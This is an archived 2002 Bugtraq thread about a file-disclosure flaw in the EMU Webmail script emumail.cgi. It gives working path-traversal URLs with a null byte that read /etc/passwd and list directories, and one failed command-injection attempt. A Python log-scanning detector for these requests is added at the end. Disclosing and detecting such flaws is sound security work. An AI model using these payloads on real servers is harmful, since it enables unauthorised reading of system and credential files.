Re: emumail.cgi

From: MegaHz (adminat_private)
Date: Sat Apr 06 2002 - 04:39:15 PST

    u can also do this:
    http://site/emumail.cgi?type=/../../../../../etc/passwd%00
    
    but u cannot do this:
    http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00
    
    /* 
     * Andreas Constantinides (MegaHz)
     * Admin of cHp (www.cyhackportal.com)
     *
     */
    
    
    ----- Original Message ----- 
    From: "N|ghtHawk" <nighthawkat_private>
    To: <bugtraqat_private>
    Sent: Friday, April 05, 2002 3:10 AM
    Subject: Re: emumail.cgi
    
    
    > >name            : emumail.cgi
    > >date            : 04/04/2002
    > >description     : EMU Webmail: how to check your email
    > >from the web. 
    > >severity        : Low/average-risk
    > >homepage        : www.emumail.com
    > >
    > >Any user can view files on the remote system:
    > >xxx/PATH/emumail.cgi?type=FILE%00
    > >
    > >
    > >
    > >The vendor was contacted about that
    > >
    > 
    > http://site/emumail.cgi?type=.%00
    > 
    > Seems to give the directory index of the current directory.
    > 
    > http://site/emumail.cgi?type=..%00
    > 
    > Seems to give the directory index of ../
    > 
    > -- 
    > N|ghtHawk
    > http://www.hackers4hackers.org
    > 
    > 
    > 
    > 
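
A detection sketch for the request shapes reported in this thread, added here as an example and not part of the original posts or of EMU Webmail: it scans web-server access-log lines for `emumail.cgi` requests whose `type` parameter decodes to a NUL byte, a `.`/`..` path segment, or an absolute path. The log format, the `/cgi-bin/` location, the benign `login` value, the double-encoded variant, and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines; addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2002:04:39:15 -0800] "GET /cgi-bin/emumail.cgi?type=/../../../../../etc/passwd%00 HTTP/1.0" 200 1432',
    '192.0.2.10 - - [06/Apr/2002:04:40:02 -0800] "GET /cgi-bin/emumail.cgi?type=.%00 HTTP/1.0" 200 812',
    '198.51.100.7 - - [06/Apr/2002:04:41:30 -0800] "GET /cgi-bin/emumail.cgi?type=login HTTP/1.0" 200 5120',  # hypothetical benign value
    '203.0.113.5 - - [06/Apr/2002:04:42:11 -0800] "GET /cgi-bin/emumail.cgi?type=..%252f..%252fetc%252fpasswd%2500 HTTP/1.0" 200 0',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %2500 -> %00 -> NUL)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_type_param(value):
    """Return the reasons a `type` value looks like a file-read attempt."""
    value = fully_decode(value)
    reasons = []
    if "\x00" in value:
        reasons.append("nul-byte")       # NUL ends the string for C-level file APIs
    head = value.split("\x00", 1)[0]     # the part a NUL-terminated open would see
    if any(seg in (".", "..") for seg in re.split(r"[\\/]", head)):
        reasons.append("dot-segment")
    if head.startswith(("/", "\\")):
        reasons.append("absolute-path")
    return reasons

def scan(lines):
    """Return (line_number, decoded_value, reasons) for suspicious emumail.cgi requests."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/emumail.cgi"):
            continue
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            reasons = classify_type_param(value) if key == "type" else []
            if reasons:
                hits.append((number, fully_decode(value), reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same `classify_type_param` check can run as input validation in front of the CGI, rejecting any request for which it returns a non-empty list.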
    



    This archive was generated by hypermail 2b30 : Mon Apr 08 2002 - 20:12:50 PDT